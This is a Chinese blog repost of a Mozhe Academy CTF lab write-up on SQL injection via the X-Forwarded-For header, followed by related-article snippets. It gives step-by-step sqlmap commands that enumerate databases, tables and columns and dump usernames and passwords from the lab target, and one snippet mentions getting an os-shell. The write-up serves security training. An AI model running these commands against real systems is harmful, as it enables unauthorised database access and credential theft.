[ 墨者学院 ] SQL注入 —— X-Forwarded-For注入漏洞实战

最新推荐文章于 2023-06-19 21:20:48 发布
最新推荐文章于 2023-06-19 21:20:48 发布
阅读量433 收藏 1
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/qtisec/p/11097191.html
版权

0x00.题目描述:

 背景介绍

某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?

实训目标

1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;

解题方向

对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。

 

0x01.解题过程:

打开靶场环境,可以看到是一个后台管理登录界面

输入用户名(admin)和密码(admin)利用BurpSuite进行抓包分析,可以看到登录失败,并提示登录的IP地址。

下面利用X-Forwoarded-For头伪装127.0.0.1进行测试,可以看到登录地址成功变成127.0.0.1*

复制RAW文件到xff.txt中,这里构造的X-Forwarded-For值为*,经过测试构造为127.0.0.1利用sqlmap跑的时候不会去识别此地方,这里利用*代替后成功执行。

构造sqlmap语句爆出数据库

sqlmap -r xff.txt --dbs --batch

构造sqlmap语句爆出数据库webcalendar的表名

sqlmap -r xff.txt -D webcalendar --table --batch

构造sqlmap语句爆出user表的字段名

sqlmap -r xff.txt -D webcalendar -T user --columns --batch

构造sqlmap语句爆出username和password字段中的内容即可,这里就不剧透username和password的具体内容了。

sqlmap -r xff.txt -D webcalendar -T user -C 'username,password' --dump --batch

利用爆出的用户名和密码登录即可获得flag

 

转载于:https://www.cnblogs.com/qtisec/p/11097191.html

weixin_30843605
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6262
墨者学院-X-Forwarded-For注入漏洞实战
墨者安全专家 v3.7.2.9
03-12
软件介绍 墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集终身 趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的"革 离术",在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止防火墙和杀毒软件尚未识别的安全危险,从源上杜绝未 知病毒的侵入,在杀毒软件还未响应前对电脑进行免疫处理,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全 防护。 墨者安全专家第二代拥有六项功能: 1、墨者革离术第二代 运用了墨者研发的新型免疫防护技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险(病毒和木马)入侵, 并在病毒库反映前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用并升级全球杀毒知名企业趋势科技的杀毒产品,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用全球杀毒知名企业趋势科技的杀毒专家,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。 如您的电脑未安装杀毒软件,为彻底清除其中已存的病毒,推荐下载墨者安全专家豪华版,内含终身免费升级的趋势杀毒软件。 墨者安全专家 3.28 版更新信息1、兼容迅雷看看桌面版、迅雷6、五笔加加 2、完善革离术兼容性 3、完善自动更新的功能
墨者杀毒软件
01-29
墨者善守并提倡兼爱,非攻的思想.<br>该软件自有安全监测和防护技术.<br>对会员提供免费的杀毒及桌面安全防护技术和服务.<br>无须任何注册码,全球首款运用权限管理的个人杀毒软件.
墨者安全专家
07-04
墨者安全专家是一款永久免费的免疫型安全防护软件,集墨者独创的 “革离术”、终身免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是独创的“革离术”,利用权限管理等功能,能有效阻止防火墙和杀毒软件尚未识别的安全危险,从源上杜绝病毒的侵入,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全防护。<br><br>
墨者学院X-Forwarded-For注入漏洞实战
痴人说梦梦中人
11-13 351
1、 使用SQLmap,构造XFF,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key。 2、 爆库 –batch #从不询问用户输入,使用所有默认配置。 -r 从一个文件中载入HTTP请求 3、 爆表 4、 爆列 5、 Dump 6、 登陆获取key ...
墨者学院 X-Forwarded-For注入漏洞实战
crasher123的博客
06-19 1642
SQLMap是一个基于Python编写的工具,因此需要安装Python。可以从Python官方网站下载Python安装包,也可以使用包管理器进行安装。如果Python已经安装,则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login,继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender,进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap。
墨者学院 ——X-Forwarded-For注入漏洞实战
知足且坚定,温柔且上进
02-09 661
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。 步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2245
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
零基础学习手工SQL注入
weixin_34110749的博客
06-07 330
SQL注入介绍SQL注入,其实就是用户浏览器提交的变量内容,应用程序(代码可能是asp、aspx、php、jsp等)对浏览器提交过来的数据未过滤,直接去数据库查询,导致把数据库里面其他内容(如管理账户和密码)查询返回到页面上。先看个《墨者学院故事会》的一个小故事:某个镇子里,银行保险柜做为一个公共区域帮居民存储贵重物品,为了防止错拿、多拿他人物品,银行规定:限制每人每次只能带一把开自己保险柜的钥匙...
java的一些学习网址。。。。。
sgkuo的专栏
03-17 6226
The Source for Java Technology Collaboration(JAVA开发的官方网站) http://www.java.net/ - 外文   2.  jGuru: FAQ Home Page 推荐 http://www.jguru.com/faq/ - 外文   3.  Developer.com: An EarthWeb site http://www
墨者安全调查:2018年DDoS威胁与黑灰产业调查报告
weixin_34294649的博客
09-05 180
说起2018年上半年的大事件,那肯定少不了世界杯了,而说起世界杯,那就不能不提到菠菜买球了。在世界杯期间,很多不懂足球平时不玩竞猜的人也多会买上几注自娱自乐,连小编这种从来不赌的也跟着买了几场。在世界杯期间足彩销售额开赛第一周,就直接飙升到了73亿,在14年的巴西世界杯期间竞彩足球的销售额也才123亿多元,这让全球菠菜业也迎来了狂欢盛宴。而在这狂欢的背后隐藏着不为人知的黑灰产...
墨者sql注入mysql
09-29
墨者在练习SQL手工注入时,发现PHP代码对客户端提交的参数未做任何过滤,可以利用这个漏洞进行注入。他可以通过两种方法来进行注入。 第一种方法是手工注入墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握手工注入的方法。然后,他可以使用字符串的MD5加解密技术来解密密码。 第二种方法是使用工具注入,如sqlmap。墨者可以使用sqlmap工具来爆破数据库名和当前用户,命令如下: sqlmap -u "http://youIP/new_list.php?id=1" -b --current-db --current-user 然后,他可以继续使用sqlmap来爆破表名,命令如下: sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -tables

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值